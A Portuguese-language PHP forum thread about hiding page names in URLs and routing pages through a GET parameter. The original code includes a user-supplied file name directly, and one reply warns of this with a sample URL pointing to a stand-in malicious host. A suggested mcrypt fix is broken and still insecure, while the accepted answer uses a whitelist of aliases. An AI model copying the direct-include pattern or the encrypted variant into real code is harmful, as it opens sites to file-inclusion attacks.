[Resolvido] Criptografar URL

[Furian 0]

Olá a todos, tenho uma dúvida, consultei várias formas de como resolver mas ainda não estou conseguindo, meu problema é que gostaria de não exibir o nome de algumas páginas no browser por medida de segurança só que não estou conseguindo encontrar um modo de como fazer isso... dei uma olhada em tópicos que falam sobre htaccess, base64_encode, MD5, urlencode() porém nada feito. Vou explicar como estou fanzendo o redirecionamento das páginas: Eu tenho uma página responsável somente pelo redirecionamento, e através dela utilizando o include pego o nome das páginas através do $_GET e dou um novo include para que a página seja exibida no local onde dei o primeiro include, tipo:

<html>

<head>

<title></title>

</head>

<body> <?php include("redireciona.php"); ?> </body>

</html>

 

E em redireciona.php eu utilizo o seguinte código:

CODE

if (isset($_GET["pagina"])) {

include $_GET["pagina"];

}

else {

include "outra.php"; // página que será exibida caso não haja nenhum redirecionamento.

}

?>

para o redirecionamento eu utilizo tipo: header("location:index.php?pagina=pagina_direcionada.php");

Entenderam... se não estiver claro eu procuro explicar melhor...

[Emilio Santiago 0]

kra oq eu posso sugerir é você codificar a pagina q você quer usando mcrypt.

você codifica oq você quer

$url = base64_encode(mcrypt_encrypt());

header("Location:redirecionar.php?pg=$url");

ai lá no seu redireciona.php você faz:

$pg = $_GET[pg]
$pg = mcrypt_decrypt(base64_encode($pg));
include($pg);

dá uma olhada nessas funções.

[Furian 0]

kra oq eu posso sugerir é você codificar a pagina q você quer usando mcrypt.

você codifica oq você quer

$url = base64_encode(mcrypt_encrypt());
 
 header("Location:redirecionar.php?pg=$url");

ai lá no seu redireciona.php você faz:

$pg = $_GET[pg]
 $pg = mcrypt_decrypt(base64_encode($pg));
 include($pg);

dá uma olhada nessas funções.

 

Ok vou dar uma olhada... vlw... grande abraço, até...

[hinom 5]

utilize simbologia

[Wanderson Regis Silva 0]

NUNCA inclua direto pelo GET:

include $_GET["pagina"];

Se alguém malicioso editar a URL: index.php?pagina=http://virus.com/download

[Furian 0]

NUNCA inclua direto pelo GET:

include $_GET["pagina"];

Se alguém malicioso editar a URL: index.php?pagina=http://virus.com/download

 

Olá a todos, gostaria de agradecer pelas respostas, tentei utilizar o código que o emílio passou, mas não funcionou. Hinom vou dar uma pesquisada em simbologia, e Wanderson se não é aconselhável utilizar o include $_GET["pagina"] como poderia modificar isso para que não houvesse margem a possibilidade citada acima?

 

Um grande abraço a todos, fiquem com Deus... até...

[Furian 0]

utilize simbologia

 

Fala aí hinom você teria o link de algum tópico que possa me passar sobre esse assunto?

Um grande abraço, fique com Deus... até...

[hinom 5]

olá furian, desculpe nao ter sido muito claro

 

o que eu quis dizer é que você pode criar um alias

 

ao invés de chamar o nome real do arquivo chame por outro nome, código, ou qualquer outra coisa.. um alias por exemplo.

 

crie as páginas abaixo, faça um teste e veja se é aplicável para o que você pretende fazer

 

 

index.php

<?php

 

$v = 'p';

if( isset( $_GET[$v] ) ){

$$v = $_GET[$v]

}

 

$pagina[1] = 'home.php';

$pagina[2] = 'noticia.php';

$pagina[3] = 'contato.php';

 

if( !isset( $pagina[$$v] ) ){

$$v = 1; // recebe um valor padrao se o valor resgatado for inválido

}

 

include $pagina[ $$v ];

echo '<hr>';

echo '<a href=?p=1>home</a>';

echo '<br /><a href=?p=2>noticia</a>';

echo '<br /><a href=?p=3>contato</a>';

?>

 

home.php

<?php

echo 'this is the home.php';

?>

 

noticia.php

<?php

echo 'this is the noticia.php';

?>

 

contato.php

<?php

echo 'this is the contato.php';

?>

 

não tem nada especial nisso.

é questão de lógica

[Furian 0]

olá furian, desculpe nao ter sido muito claro

 

o que eu quis dizer é que você pode criar um alias

 

ao invés de chamar o nome real do arquivo chame por outro nome, código, ou qualquer outra coisa.. um alias por exemplo.

 

crie as páginas abaixo, faça um teste e veja se é aplicável para o que você pretende fazer

 

 

index.php

<?php

 

$v = 'p';

if( isset( $_GET[$v] ) ){

$$v = $_GET[$v]

}

 

$pagina[1] = 'home.php';

$pagina[2] = 'noticia.php';

$pagina[3] = 'contato.php';

 

if( !isset( $pagina[$$v] ) ){

$$v = 1; // recebe um valor padrao se o valor resgatado for inválido

}

 

include $pagina[ $$v ];

echo '<hr>';

echo '<a href=?p=1>home</a>';

echo '<br /><a href=?p=2>noticia</a>';

echo '<br /><a href=?p=3>contato</a>';

?>

 

home.php

<?php

echo 'this is the home.php';

?>

 

noticia.php

<?php

echo 'this is the noticia.php';

?>

 

contato.php

<?php

echo 'this is the contato.php';

?>

 

não tem nada especial nisso.

é questão de lógica

 

 

Muito obrigado Hinom... foi de grande ajuda... no caso não era exatamente isso que eu queria, eu queria que aparecesse a página criptografada... tipo index.php?page=dfaasdfwerqewzdfad, mas esse código que você postou está excelente... já dá pra ter mais segurança assim... outra coisa... não querendo ser chato... mas existe perigo de alguém utilizar o que o Wanderson Regis Silva falou nesse código?

[hinom 5]

mas existe perigo de alguém utilizar o que o Wanderson Regis Silva falou nesse código?

100% seguro

 

e nao há necessidade de criptografar. nao fará diferença nenhuma. a não ser que queira impressionar leigos.

 

esse codigo que mostrei nao faz nada especial, escrevi aqui na hora pra mostrar um exemplo qualquer.

 

com base nisso, estude .

 

 

t+

[Furian 0]

mas existe perigo de alguém utilizar o que o Wanderson Regis Silva falou nesse código?

100% seguro

 

e nao há necessidade de criptografar. nao fará diferença nenhuma. a não ser que queira impressionar leigos.

 

esse codigo que mostrei nao faz nada especial, escrevi aqui na hora pra mostrar um exemplo qualquer.

 

com base nisso, estude .

 

 

t+

 

Muito obrigado... apresentou um pequeno erro aqui, mas esse vou tentar resolver por mim mesmo... você já adjudou bastante... um dia eu chego lá... grande abraço, fique com Deus... até... pode dar o tópico como resolvido...

 

 

[hinom 5]

if( isset( $_GET[$v] ) ){

$$v = $_GET[$v]; // <- esqueci do ponto e vírgula aqui..

}

flows